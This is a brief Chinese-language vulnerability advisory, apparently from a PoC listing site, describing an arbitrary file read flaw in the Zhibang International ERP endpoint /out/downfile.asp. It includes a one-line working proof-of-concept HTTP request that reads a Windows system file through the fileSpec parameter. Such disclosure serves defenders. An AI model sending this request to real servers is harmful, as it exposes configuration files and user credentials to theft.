智邦国际ERP /out/downfile.asp 文件读取漏洞

2026-07-24 智邦国际ERP PoC Public

Description

ERP系统的/out/downfile.asp接口存在任意文件读取漏洞,攻击者可以通过构造特定的请求读取服务器上的任意文件,从而导致敏感信息泄露,例如系统配置文件、用户凭据等。

PoC

GET /out/downfile.asp?fileSpec=C:/Windows/win.ini HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities